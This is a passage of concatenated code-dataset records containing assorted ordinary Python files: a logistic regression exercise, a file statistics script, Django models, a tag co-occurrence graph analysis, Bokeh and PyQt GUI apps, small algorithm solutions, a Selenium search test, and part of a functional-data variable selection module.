return 1/(1 + np.exp(-x)) \n\ndef loss(y,y_hat): return -(y*np.log(y_hat)+(1-y)*np.log(1-y_hat))\n\n\ny = sigmoid(2*x_1 - x_2 + 0.5 + .1*np.random.randn(100,1))\ny = np.where(y >= 0.5, 1, 0) # convert to 1/0, probability boundry 0.5 \n\n\n# train test split\nidx = np.arange(100)\nnp.random.shuffle(idx)\ntrain_idx = idx[:80]\nval_idx = idx[80:]\nx1_train, x2_train, y_train = x_1[train_idx], x_2[train_idx], y[train_idx]\nx1_val, x2_val, y_val = x_1[val_idx], x_2[val_idx], y[val_idx]\n\n# initialize parameters\nnp.random.seed(42)\nw_1 = np.random.randn(1)\nw_2 = np.random.randn(1)\nb = np.random.randn(1)\n#print(w_1, w_2, b)\n\n'''\nTrain Model\n'''\n# learning rate eta\nlr = 1e-1\nepochs = 1000\nlength = len(x1_train)\ndelta_w1 = 0 \ndelta_w2 = 0 \ndelta_b = 0\nloss_old = 99999999999999999999\nloss_new = 0\n\nfor epoch in range(epochs):\n y_hat_liste = np.empty([length,1]) \n loss_liste = np.empty([length,1])\n\n for i in range(0,length-1): # iterate over all training values to get y_hat for each pair x_1, x_2\n z = x1_train[i] * w_1 + x2_train[i] * w_2 + b\n y_hat = sigmoid(z)\n y_hat_liste[i] = y_hat\n \n loss_liste[i] = loss(y_train[i],y_hat) # calculate the loss for all y_hat\n \n for m in range(0,length-1): # calculate partialderivatives for w_1, w_2, b\n delta_w1 += (y_hat_liste[m]-y_train[m])*x1_train[m]\n delta_w2 += (y_hat_liste[m]-y_train[m])*x2_train[m]\n delta_b += y_hat_liste[m]-y_train[m] \n '''\n loss_new = sum(loss_liste)/len(loss_liste) #adapt learning rate to get better result\n if lr > 1e-3:\n if loss_new > loss_old:\n lr /= 2\n else:\n loss_old = loss_new\n else:\n loss_old = loss_new\n ''' \n delta_w1 = delta_w1/length\n delta_w2 /= length\n delta_b /= length\n \n w_1 -= lr*delta_w1\n w_2 -= lr*delta_w2\n b -= lr*delta_b\n \nprint(\"Values of the model:\\n W_1 = \",w_1,\"\\n W_2 = \",w_2,\"\\n b = \",b) \n\n\n\n'''\nEvaluate Model\n'''\nlength_val = len(y_val)\ny_hat_liste_val= np.empty([length_val,1]) \nloss_liste_val = np.empty([length_val,1])\n\nfor i in range(0,length_val-1): # iterate over all training values to get y_hat for each pair x_1, x_2\n z = x1_val[i] * w_1 + x2_val[i] * w_2 + b\n y_hat_val = sigmoid(z)\n y_hat_liste_val[i] = y_hat_val\n \n loss_liste[i] = loss(y_val[i],y_hat_val) \n\n\ncount_prob = 0 # ecvaluate the probability of the model\nfor n in range(0,length_val):\n if y_hat_liste_val[n] > 0.5:\n y_hat_liste_val[n] = 1\n else:\n y_hat_liste_val[n] = 0\n\n if int(y_hat_liste_val[n]) == y_val[n]:\n count_prob += 1\n\nloss= sum(loss_liste)/len(loss_liste)\nprint(\"Loss = \",loss,\"\\nProbability = \",count_prob/20)\n","sub_path":"Exercise_04/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"463181062","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/12/6 0006 13:40\n# @Author : boy\n# @File : get_scripts.py\n# @Software: PyCharm\n\nimport datetime\nimport io\nimport os\nimport time\n'''\n处理文件\nfilename: 处理的文件名\n求最大值与平均值,并将结果写入文件中\n'''\ndef deal(filename):\n with io.open(filename,'r',encoding='utf-8') as f:\n lines =f.readlines()\n first_date = lines[0].split()[0]\n max = float(lines[0].split()[2])\n result = [x.rstrip() for x in lines]\n result.append('0 0 0')\n sum = 0\n flag = 0\n for tmp in result:\n row = [x for x in tmp.split()]\n if row[0] == first_date:\n if float(row[2]) > max:\n max = float(row[2])\n sum += float(row[2])\n flag += 1\n else:\n path = \"result/\"\n (filepath, tempfilename) = os.path.split(filename)\n (file_name, extension) = os.path.splitext(tempfilename)\n tmp_filename = path + file_name + '_result.txt'\n with io.open(tmp_filename ,'a+',encoding='utf-8') as w :\n w.writelines(\"{0} {1} {2}\".format(first_date, max, '%.2f' %(sum/flag))+ '\\n')\n print(\"{0} {1} {2}\".format(first_date, max, '%.2f' %(sum/flag)))\n flag = 0\n sum = 0\n first_date = row[0]\n max = 0\n\n'''\n使用说明\n'''\ndef readme():\n path = \"files/\"\n files = os.listdir(path)\n print(\"==========================================================\")\n print(\"使用说明:\")\n print(\"将要处理的文件放在files目录下,结果在result目录下\")\n print(\"==========================================================\")\n print(\"1、指定文件名进行处理\")\n print(\"2、处理该目录下的所有文件\")\n print(\"==========================================================\")\n command = input(\"输入你的选择:1 or 2:\")\n if command == '1':\n if files == []:\n print (\"目录下为空,请放入待处理的文件\")\n time.sleep(3)\n else:\n file = input(\"请输入要处理的文件名:{} :\".format(files))\n deal(path + file)\n if command == '2':\n if files == []:\n print (\"目录下为空,请放入待处理的文件\")\n time.sleep(3)\n else:\n read_all_file()\n else:\n print(\"请输入正确的选择\")\n\n\n\n'''\n遍历目录下所有文件\n'''\ndef read_all_file():\n path = \"files/\"\n files = os.listdir(path)\n for file in files:\n deal(path + file)\n\n\ndef main():\n start_time = datetime.datetime.now()\n readme()\n end_time = datetime.datetime.now()\n print('All job run %0.2f s' % (end_time - start_time).total_seconds())\nif __name__ == '__main__':\n main()\n","sub_path":"get-file-max-avg/get_scripts.py","file_name":"get_scripts.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"333477327","text":"from django.db import models\n\n\nclass Level(models.Model):\n name = models.CharField(max_length=150)\n fill_priority = models.IntegerField()\n motorcycle_spaces = models.IntegerField()\n car_spaces = models.IntegerField()\n\n @classmethod\n def get_available_level_by_priority(cls, vehicle_type):\n all_levels = cls.objects.all().order_by('fill_priority')\n\n chosen_level = None\n for level in all_levels:\n level_capacity = level.car_spaces if vehicle_type == 'car' else level.motorcycle_spaces\n\n if level.level_spaces.filter(\n variety=vehicle_type).count() < level_capacity:\n chosen_level = level\n break\n\n return chosen_level\n\n\nclass LevelSpace(models.Model):\n variety = models.CharField(max_length=150)\n level_name = models.CharField(max_length=150)\n\n level = models.ForeignKey(Level,\n related_name='level_spaces',\n on_delete=models.CASCADE)\n","sub_path":"levels/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"286379243","text":"from collections import defaultdict\nimport xlrd\nimport re\nimport math\n\nimport community\nimport networkx as nx\n\nimport matplotlib.pyplot as plt\n\nimport DataReading as DR\n\nimport HITSModule as HITS\n\nimport IgsTgsAnalysis as IgsTgs\n\nimport pip\n\nimport time\nimport TgsGraphAnalysis as TgsGrph\n\n\ndef main():\n\n\n #region confirm title group\n # title_list=read_title_list_from_excel('Data/Try_Function.xlsx')\n # list_tgs_certain_group=['tag1','tag2','tag3']\n #\n title_list=read_title_list_from_excel('Data/Experiment_Resutls_170516/photo_list_July_without_Ads_Title.xlsx')\n\n list_tgs_certain_group=read_tag_list_from_excel('Data/Experiment_Resutls_170516/food_tags_without_Ads.xlsx')\n #\n list_flags_title_certain_grp=IgsTgs.Confirm_Title_Group(title_list,list_tgs_certain_group)\n\n write_list_flags_title_grp_2_excel(list_flags_title_certain_grp,'Data/Experiment_Resutls_170516/title_grp.txt')\n\n #endregion\n\n # G = HITS.create_user_checkingroup_graph('Data/Sample/user_checkin_group_sample.xlsx')\n # HITS.myHITS(G, 1, 'Data/Sample/cluster_poi_count_sample.xlsx')\n # AnalysisGraphFromTitle()\n\n print()\n\n\n\n\ndef AnalysisGraphFromTitle():\n\n start=time.clock()\n\n # region Construct empty matrix and list to store the information of tags co-occurance\n title_list=DR.read_title_list_from_excel('Data/Experiment_Resutls_May16/photo_list_July_without_Ads_Title.xlsx')\n # title_list=read_title_list_from_excel('Data/sub_photo_list_July_Title.xlsx')\n\n # list_stdrd_tags= IgsTgs.generate_stdrd_tgs_list(title_list) #a standard list that c\n # list_stdrd_tags = ['Craftsmanship', 'handmade', 'learningnewstuffeveryday', 'islandtang']\n\n list_stdrd_tags =DR.read_small_sample_tgs('Data/Experiment_Resutls_May16/Saved_Tgs_Info_SortedBy_frequency_July_without_Ads_Small_Sample_30.xlsx') # Use a small sample of tags to calculate the adjacency so that the results can be visualized in the Gephi\n\n # tgs_matrix= IgsTgs.generate_empty_tg_matrix(list_stdrd_tags) # Generate empry tgs matrix, This line of code is annotated for the size of the matrix is too large\n\n list_tgs_frqc= IgsTgs.gnrt_empty_tgs_frqc_list(list_stdrd_tags) # Generate empry list to store the frequency of each tag\n # endregion\n\n tg_adjacency_list=IgsTgs.generate_empty_tg_adjacency_list(list_stdrd_tags)\n\n #region reomve some dominant and meaningless tags in list_stdrd_tags\n # list_stdrd_tags.remove('hkig')\n # list_stdrd_tags.remove('HKIG')\n # list_stdrd_tags.remove('HongKong')\n # list_stdrd_tags.remove('hongkong')\n # list_stdrd_tags.remove('hk')\n # list_stdrd_tags.remove('HK')\n #\n # list_stdrd_tags.remove('tst')\n # list_stdrd_tags.remove('causewaybay')\n # list_stdrd_tags.remove('wanchai')\n #\n # list_stdrd_tags.remove('hkboy')\n # list_stdrd_tags.remove('hkgirl')\n # list_stdrd_tags.remove('hkgirls')\n # list_stdrd_tags.remove('hkiger')\n #\n # list_stdrd_tags.remove('instagood')\n # list_stdrd_tags.remove('igers')\n # list_stdrd_tags.remove('ighk')\n # list_stdrd_tags.remove('hkigers')\n # list_stdrd_tags.remove('iger')\n # list_stdrd_tags.remove('photooftheday')\n # list_stdrd_tags.remove('picoftheday')\n # list_stdrd_tags.remove('instamood')\n # list_stdrd_tags.remove('igdaily')\n # list_stdrd_tags.remove('instalike')\n #endregion\n\n # list_stdrd_tags=['Craftsmanship','handmade','learningnewstuffeveryday','islandtang']\n\n # region Update tgs matrix and tgs frequency list\n for each_lst_tags_title in title_list:\n list_tags_from_oen_title=IgsTgs.get_tg_list_from_one_title(each_lst_tags_title[0])\n # IgsTgs.update_tg_mtrx(list_tags_from_oen_title,list_stdrd_tags,tgs_matrix) #Update tgs matrix, This line of code is annotated for the size of the matrix is too large\n IgsTgs.update_tgs_frqc(list_tags_from_oen_title,list_stdrd_tags, list_tgs_frqc) #Update tgs frequency list\n IgsTgs.updata_tg_adjacency_list(list_tags_from_oen_title,list_stdrd_tags,tg_adjacency_list)\n # endregion\n\n # region Write the tags co-occurance matrix into xls file\n # write_matrix_into_xls(list_stdrd_tags,tgs_matrix)\n # endregion\n\n # region Write the tag's name and it's count into the txt file\n list_tgs_with_frqc = IgsTgs.extend_tgs_info_list(list_stdrd_tags,list_tgs_frqc) #Add frequency to the tags\n\n list_tgs_with_frqc = IgsTgs.remove_tgs_occure_once(list_tgs_with_frqc)\n\n # write_tgs_info_into_txt(list_tgs_with_frqc,'Saved_Tgs_Info_Standard_Order.txt') #Write tags count in standard order\n # endregion\n\n # region Do community detection and write the partition result into txt file\n # G=TgsGrph.cnstrct_graph_from_2d_list(tgs_matrix)\n # partition=TgsGrph.graph_partition(G)\n G2=TgsGrph.cnstrct_graph_from_tg_adjacency_list(tg_adjacency_list)\n partition2=TgsGrph.graph_partition(G2)\n\n list_tgs_frqc_partition=IgsTgs.extend_tgs_info_list(list_tgs_with_frqc,partition2) #Add the partition to the tags with frequency\n elapsed=(time.clock()-start)\n print(\"Time used:\", elapsed)\n\n # TgsGrph.graph_partition_drawing(partition,G)\n # write_patition_info_into_txt(partition,'Saved_Tgs_Partition_Standard_Order.txt')\n #endregion\n\n DR.write_tgs_adjacency_list(list_stdrd_tags, tg_adjacency_list) #Write Adjacency list\n print()\n\ndef construct_empty_tg_matrix(title_list,tgs_matrix1,list_stdrd1):\n\n\n _list_tags_from_titles = [] # list of tags without sharp symbol\n for title in title_list:\n _tags_with_sharp_in_one_title=set(re.findall('#\\w+(?=\\s)|#\\w+(?=#)|#\\w+(?=$)', str(title[0]))) # 把找到_list_tags_with_sharp先转化成set,去掉在一次post中重复多次的Tag\n # Use three regular expression to extract the tag in the title, take title '#VSCOcam haeco in the#dark#Audi #A6' for example\n # '#\\w+\\s' extracts tags start with '#' with space appending to tag(expression not extract the space), e.g.'#VSCOcam' '#Audi'\n # '#\\w+(?=#)' extracts tags start with '#' with '#' appending to tag(expression not extract #), e.g. '#Audi'\n # '#\\w+(?=$)' extracts tags start with '#' with an ending of the total string appeding to the tag\n for tag_with_sharp in _tags_with_sharp_in_one_title:\n _list_tags_from_titles.append(tag_with_sharp[1:]) # list cantaining tags without sharp, and this list could contain duplicate tags because different title could contain same tags\n\n\n list_stdrd1.extend(list(set(_list_tags_from_titles))) #这样使得list_stdrd1仍然在实参的内存对象上进行操作,避免list_stdrd1指向新的对象。\n list_stdrd1.sort() # list contain sorted tags in all the titles without duplicate, this var can be used as the the list that contain the standard order of tags\n\n\n #when construct the matrix, we should use the tags list of title wiout duplicate tags\n _n_tgs_conut=len(list_stdrd1)\n tgs_matrix1.extend([[0 for i in range(_n_tgs_conut)] for i in range(_n_tgs_conut)])\n\n\n\n\n print()\n\ndef read_title_list_from_excel(str_excel_location):\n\n Title_data=xlrd.open_workbook(str_excel_location)\n Table=Title_data.sheets()[0]\n title_list=Table._cell_values[1:] #除了表头,其他的就是要读的数据\n\n return title_list\n\ndef write_list_flags_title_grp_2_excel(list_flags_title_certain_grp,txt_name):\n\n with open(txt_name,\"w\") as text_file:\n for i in range(0, len(list_flags_title_certain_grp)):\n text_file.write('%s'% (str(list_flags_title_certain_grp[i])))\n text_file.write('\\n')\n\ndef read_tag_list_from_excel(str_excel_location):\n\n Excel_data = xlrd.open_workbook(str_excel_location)\n Table=Excel_data.sheets()[0]\n tag_list=list()\n for i in range(len(Table._cell_values)):\n tag_list.extend(Table._cell_values[i])\n\n return tag_list\n\ndef update_tg_mtrx(each_lst_tags_title, tags_matrix1, list_stdrd1):\n \"\"\"\n Read each list that contains the tags of one title, and update the tag matrix\n Because the data volume handled is large, so here update the matrix as we analyze each list of the tags, rather than calculate the matrix at once using all the tag lists\n :param each_lst_tags_title: the list that contains the tags of one title.\n :param tags_matrix1: the input tag matrix, because in python, the parameter refer to same area in memory, so the value of tags_matrix will be updated automatically\n :param list_stdrd1: the list that contain the standard order of tags,used for determining the meaning of the index of matrix\n :return:\n \"\"\"\n\n\n for start_item_in_title in each_lst_tags_title:\n strt_item_idx_in_tgs_title=each_lst_tags_title.index(start_item_in_title)\n strt_item_idx_in_matrix=list_stdrd1.index(start_item_in_title)\n for i in range(strt_item_idx_in_tgs_title+1,len(each_lst_tags_title)):\n crt_item_idx_in_matrix=list_stdrd1.index(each_lst_tags_title[i])\n tags_matrix1[strt_item_idx_in_matrix][crt_item_idx_in_matrix]+=1\n tags_matrix1[crt_item_idx_in_matrix][strt_item_idx_in_matrix]+=1\n\ndef graph_partition_drawing(G):\n # first compute the best partition\n partition = community.best_partition(G)\n # drawing\n size = float(len(set(partition.values())))\n pos = nx.spring_layout(G)\n count = 0.\n for com in set(partition.values()):\n count = count + 1.\n list_nodes = [nodes for nodes in partition.keys()\n if partition[nodes] == com]\n nx.draw_networkx_nodes(G, pos, list_nodes, node_size=20,\n node_color=str(count / size))\n\n nx.draw_networkx_edges(G, pos, alpha=0.5)\n plt.show()\n\n\nmain()","sub_path":"TryFunction.py","file_name":"TryFunction.py","file_ext":"py","file_size_in_byte":9662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"516406390","text":"# -*- coding: utf-8 -*- \nimport sys\nimport pandas as pd\nfrom chrysalids.model import mutant_app\nfrom chrysalids.wildtype import induction_app\nfrom chrysalids.dna_muts import dna_app\nimport bokeh.io\nimport bokeh.plotting\nfrom bokeh.models import ColumnDataSource, Div\nfrom bokeh.layouts import layout, widgetbox\nfrom bokeh.models.widgets import Select, Slider, RadioButtonGroup\nimport bokeh.themes\nimport glob\nimport mut.viz\ncolors = mut.viz.color_selector('pboc')\n\n# ###########################\n# DATA LOADING\n# ############################\nind_data = pd.read_csv('mwc_mutants/data/csv/RazoMejia2018_data.csv')\nind_data['repressors'] *= 2\nind_data.rename(columns={'fold_change_A':'fold_change',\n 'IPTG_uM':'IPTGuM'}, inplace=True)\nind_data = ind_data[ind_data['repressors'] > 0 ].copy()\n\n# ###########################\n# MUTANT DATA PRUNING\n# ##########################\nmut_data = pd.read_csv('mwc_mutants/data/csv/compiled_data.csv')\ndbohr_stats = pd.read_csv('mwc_mutants/data/csv/empirical_F_statistics.csv')\nepRA_stats = pd.read_csv('mwc_mutants/data/csv/DNA_binding_energy_summary.csv')\nDNA_data = mut_data[((mut_data['class']=='WT') | (mut_data['class']=='DNA')) & \n (mut_data['operator']=='O2')]\nDNA_stats = dbohr_stats[dbohr_stats['class']=='DNA'].copy()\n\n# #############################\n# THEME DETAILS\n# ############################\ntheme_json = {'attrs':\n {'Figure': {\n 'background_fill_color': '#E3DCD0',\n 'outline_line_color': '#FFFFFF',\n },\n 'Axis': {\n 'axis_line_color': \"white\",\n 'major_tick_in': 7,\n 'major_tick_line_width': 2.5,\n 'major_tick_line_color': \"white\",\n 'minor_tick_line_color': \"white\",\n 'minor_tick_line_color': \"white\",\n 'axis_label_text_font': 'Lucida Sans',\n 'axis_label_text_font_style': 'normal'\n },\n 'Grid': {\n 'grid_line_color': None,\n },\n 'Text': {\n 'text_font_style': 'normal',\n 'text_font': 'Lucida Sans'\n },\n 'Title': {\n 'background_fill_color': '#FFEDC0',\n 'text_font_style': 'normal',\n 'align': 'center',\n 'text_font': 'Lucida Sans',\n 'offset': 2,\n }}}\n\nprint(epRA_stats.head())\ntheme = bokeh.themes.Theme(json=theme_json)\ntab1 = mutant_app()\ntab2 = induction_app(ind_data)\ntab3 = dna_app(DNA_data, DNA_stats, epRA_stats)\ntabs = bokeh.models.widgets.Tabs(tabs=[tab1, tab2, tab3])\nbokeh.io.curdoc().theme = theme\nbokeh.io.curdoc().add_root(tabs)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"7293248","text":"# -*- coding: utf-8 -*-\n\"\"\"\nGraphical user interface to the conda package manager\n\"\"\"\n\nfrom PyQt5 import QtCore, QtWidgets\n\nfrom .conda import Environment\nfrom .controller import CondaController, base_environment\nfrom .qbusyindicator import QBusyIndicator\n\n\nclass CondaGUI(QtWidgets.QMainWindow):\n\n # Emit this whenever we want to know all available environments\n request_updated_available_environments = QtCore.pyqtSignal()\n\n # Emit this signal when we choose a new active environment\n change_active_environment = QtCore.pyqtSignal(Environment)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n # Object responsible for interactions with conda. This will take place in another thread.\n self._controller_thread = QtCore.QThread(parent = self)\n self.controller = CondaController()\n self.controller.moveToThread(self._controller_thread)\n self._controller_thread.start()\n\n # Connect controller signals\n self.controller.environment_changed.connect(self.update_active_environment)\n self.change_active_environment.connect(self.controller.change_active_environment)\n\n # Status bar goes at the bottom of the window\n # Most importantly used for a 'busy' indicator\n status_bar = QtWidgets.QStatusBar(parent = self)\n self.setStatusBar(status_bar)\n\n busy_indicator = QBusyIndicator(parent = self)\n self.controller.operation_in_progress.connect(busy_indicator.toggle_animation)\n status_bar.addPermanentWidget(busy_indicator)\n\n # Active environment information\n self.name_label = QtWidgets.QLabel('--')\n self.path_label = QtWidgets.QLabel('--')\n for label in (self.name_label, self.path_label):\n label.setAlignment(QtCore.Qt.AlignHCenter)\n\n # Layout displaying basic information about the current active environment\n info_layout = QtWidgets.QFormLayout()\n info_layout.addRow('Environment name: ', self.name_label)\n info_layout.addRow('Environment path: ', self.path_label)\n\n # Get packages list by clicking a button\n update_packages_list_btn = QtWidgets.QPushButton('Update packages list')\n update_packages_list_btn.clicked.connect(self.controller.update_packages_list)\n update_packages_list_btn.setSizePolicy(\n QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Maximum\n )\n\n # Displaying the packages list is taken care of by a custom widget\n self.packages_list_widget = PackagesListWidget()\n self.controller.packages_list.connect(self.packages_list_widget.set_packages_list)\n\n # Layout related to the active environment\n environment_layout = QtWidgets.QVBoxLayout()\n environment_layout.addLayout(info_layout)\n environment_layout.addWidget(self.packages_list_widget)\n environment_layout.addWidget(update_packages_list_btn)\n\n # Place all widgets related to the current environment in their own QFrame widget\n # This way, we can distinguish those widgets from general widgets\n environment_frame = QtWidgets.QFrame()\n environment_frame.setLayout(environment_layout)\n environment_frame.setFrameShadow(QtWidgets.QFrame.Sunken)\n environment_frame.setFrameShape(QtWidgets.QFrame.Panel)\n \n # Overall layout\n layout = QtWidgets.QVBoxLayout()\n layout.addWidget(environment_frame)\n\n # A central widget is needed to layout other widgets\n self.central_widget = QtWidgets.QWidget(parent = self)\n self.central_widget.setLayout(layout)\n self.setCentralWidget(self.central_widget)\n\n # The window must also be shown, otherwise nothing happens\n self.setWindowTitle('CondaGUI')\n self.show()\n\n # initial update\n self.request_updated_available_environments.emit()\n self.change_active_environment.emit(base_environment())\n\n def closeEvent(self, event):\n \"\"\" This event is triggered when the user closes the window. \"\"\"\n self._controller_thread.quit()\n super().closeEvent(event)\n \n @QtCore.pyqtSlot(Environment)\n def update_active_environment(self, env):\n \"\"\" Update main window due to a change in active environment \"\"\"\n self.name_label.setText(env.name)\n self.path_label.setText(env.path)\n self.packages_list_widget.clear()\n\nclass PackagesListWidget(QtWidgets.QTableWidget):\n \"\"\" \n Customized widget to display list of `Package` instances.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.verticalHeader().hide()\n self.setEditTriggers(\n QtWidgets.QAbstractItemView.NoEditTriggers\n ) #no edit triggers, see QAbstractItemViews\n\n @QtCore.pyqtSlot(set)\n def set_packages_list(self, packages):\n \"\"\" Update the packages list widget based on a list of packages \"\"\"\n packages = sorted(packages, key = lambda p: p.name)\n self.clear()\n\n # Special case : empty environments\n if len(packages) == 0:\n self.setRowCount(1)\n self.setColumnCount(1)\n item = QtWidgets.QTableWidgetItem('No packages installed in this environment')\n self.setItem(0, 0, item)\n return\n\n # If list of environments is not empty, we proceed with listing them\n self.setRowCount(len(packages))\n self.setColumnCount(3)\n self.setHorizontalHeaderLabels(['Package', 'Version', 'Channel'])\n for row, package in enumerate(packages):\n self.setItem(row, 0, QtWidgets.QTableWidgetItem(package.name))\n self.setItem(row, 1, QtWidgets.QTableWidgetItem(package.version))\n self.setItem(row, 2, QtWidgets.QTableWidgetItem(package.channel))\n\n self.horizontalHeader().setStretchLastSection(True)\n","sub_path":"condagui/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"477490706","text":"import bisect\n\n\ndef calc(l, r):\n index_small = bisect.bisect_left(a, l)\n index_large = bisect.bisect_right(a, r)\n num = index_large - index_small\n if num == 0:\n ans = A\n else:\n ans = B * (r - l + 1) * num\n if l != r and num != 0:\n mid = (l+r-1)/2\n ans = min(ans, calc(l, mid) + calc(mid+1, r))\n return ans\n\n\n[n, k, A, B] = list(map(int, input().split()))\nglobal a\na = list(map(int, input().split()))\na.sort()\nr = 1 << n\nprint(int(calc(1, r)))\n","sub_path":"Codeforces/contest/1111/C.py","file_name":"C.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"646562155","text":"class Solution:\n \"\"\"\n @param: : A list of integers\n @return: A list of unique permutations\n \"\"\"\n def permuteUnique(self, nums):\n if nums is None or len(nums) == 0:\n return []\n result = []\n nums.sort()\n self.dfs(nums, [], result, [False for _ in range(len(nums))])\n return result\n \n def dfs(self, nums, subset, result, visited):\n if len(nums) == len(subset):\n # result.append(copy.deepcopy(subset)) # python2\n result.append(subset.copy()) # python3\n return\n \n for i in range(len(nums)):\n if visited[i] or i != 0 and nums[i] == nums[i-1] and not visited[i-1]:\n # illegal visit will occur\n continue\n visited[i] = True\n subset.append(nums[i])\n self.dfs(nums, subset, result, visited)\n visited[i] = False\n subset.pop()\n","sub_path":"Python/lintcode_python/16_permutation_ii.py","file_name":"16_permutation_ii.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"462632597","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 23 21:30:58 2020\r\n\r\n@author: user\r\n\"\"\"\r\n\r\nimport face_recognition as fr\r\nimport cv2\r\n\r\nimage = cv2.imread('football1.jpg')\r\nface_locations = fr.face_locations(image, number_of_times_to_upsample=2)\r\n\r\nfor face_location in face_locations:\r\n\r\n # 이미지에서 얼굴이 인식된 위치를 기록\r\n top, right, bottom, left = face_location\r\n\r\n # 얼굴 위치에 사각형 추가\r\n cv2.rectangle(image,(left,top),(right,bottom),(255,0,0),2)\r\n\r\n# 결과를 화면에 표시함\r\ncv2.imshow('image',image)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"12주/KOCW_12주_3.py","file_name":"KOCW_12주_3.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"123587486","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nimport unittest\nimport HtmlTestRunner\n\n\nclass GoogleSearch(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n\n cls.setPath = 'Chrome'\n if cls.setPath == 'Chrome':\n cls.driver = webdriver.Chrome()\n else:\n cls.driver = webdriver.Ie()\n # Search in google\n cls.driver.set_page_load_timeout(10)\n cls.driver.maximize_window()\n\n def test_search_automation(self):\n # Access to google\n self.driver.get(\"http://google.com\")\n # Find by name by google\n que = self.driver.find_element_by_name(\"q\")\n que.send_keys(\"Automation step by step\")\n time.sleep(2)\n # Click button\n que.send_keys(Keys.ARROW_DOWN)\n que.send_keys(Keys.ENTER)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.maximize_window()\n cls.driver.refresh()\n time.sleep(5)\n cls.driver.quit()\n\n\nif __name__ == '__main__':\n unittest.main(testRunner=HtmlTestRunner.HTMLTestRunner(\n output='D:/DATA\\Electronic/Electronic Study/Python/Selenium/2.Unit_Test'))\n","sub_path":"Selenium/2.Unit_Test/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"275192450","text":"import dcor\n\nimport scipy.signal\nimport sklearn.base\nimport sklearn.utils\n\nimport numpy as np\n\nfrom ....representation import FDataGrid\n\n\ndef _compute_dependence(X, y, *, dependence_measure):\n '''\n Computes the dependence of each point in each trajectory in X with the\n corresponding class label in Y.\n '''\n\n # Move n_samples to the end\n # The shape is now input_shape + n_samples + n_output\n X = np.moveaxis(X, 0, -2)\n\n input_shape = X.shape[:-2]\n\n # Join input in a list for rowwise\n X = X.reshape(-1, X.shape[-2], X.shape[-1])\n\n if y.ndim == 1:\n y = np.atleast_2d(y).T\n Y = np.array([y] * len(X))\n\n dependence_results = dcor.rowwise(dependence_measure, X, Y)\n\n return dependence_results.reshape(input_shape)\n\n\ndef select_local_maxima(X, *, order: int=1):\n r'''\n Compute local maxima of an array.\n\n Points near the boundary are considered maxima looking only at one side.\n\n For flat regions only the boundary points of the flat region could be\n considered maxima.\n\n Parameters:\n\n X (numpy array): Where to compute the local maxima.\n order (callable): How many points on each side to look, to check if\n a point is a maximum in that interval.\n\n Examples:\n\n >>> from skfda.preprocessing.dim_reduction.variable_selection.\\\n ... maxima_hunting import select_local_maxima\n >>> import numpy as np\n\n >>> x = np.array([2, 1, 1, 1, 2, 3, 3, 3, 2, 3, 4, 3, 2])\n >>> select_local_maxima(x).astype(np.int_)\n array([ 0, 5, 7, 10])\n\n The ``order`` parameter can be used to check a larger interval to see\n if a point is still a maxima, effectively eliminating small local\n maxima.\n\n >>> x = np.array([2, 1, 1, 1, 2, 3, 3, 3, 2, 3, 4, 3, 2])\n >>> select_local_maxima(x, order=3).astype(np.int_)\n array([ 0, 5, 10])\n\n '''\n indexes = scipy.signal.argrelextrema(\n X, comparator=np.greater_equal, order=order)[0]\n\n # Discard flat\n maxima = X[indexes]\n\n left_points = np.take(X, indexes - 1, mode='clip')\n right_points = np.take(X, indexes + 1, mode='clip')\n\n is_not_flat = (maxima > left_points) | (maxima > right_points)\n\n return indexes[is_not_flat]\n\n\nclass MaximaHunting(sklearn.base.BaseEstimator, sklearn.base.TransformerMixin):\n r'''\n Maxima Hunting variable selection.\n\n This is a filter variable selection method for problems with a target\n variable. It evaluates a dependence measure between each point of the\n function and the target variable, and keeps those points in which this\n dependence is a local maximum.\n\n Selecting the local maxima serves two purposes. First, it ensures that\n the points that are relevant in isolation are selected, as they must\n maximice their dependence with the target variable. Second, the points\n that are relevant only because they are near a relevant point (and are\n thus highly correlated with it) are NOT selected, as only local maxima\n are selected, minimizing the redundancy of the selected variables.\n\n For a longer explanation about the method, and comparison with other\n functional variable selection methods, we refer the reader to the\n original article [1]_.\n\n Parameters:\n\n dependence_measure (callable): Dependence measure to use. By default,\n it uses the bias corrected squared distance correlation.\n local_maxima_selector (callable): Function to detect local maxima. The\n default is :func:`select_local_maxima` with ``order`` parameter\n equal to one. The original article used a similar function testing\n different values of ``order``.\n\n Examples:\n\n >>> from skfda.preprocessing.dim_reduction import variable_selection\n >>> from 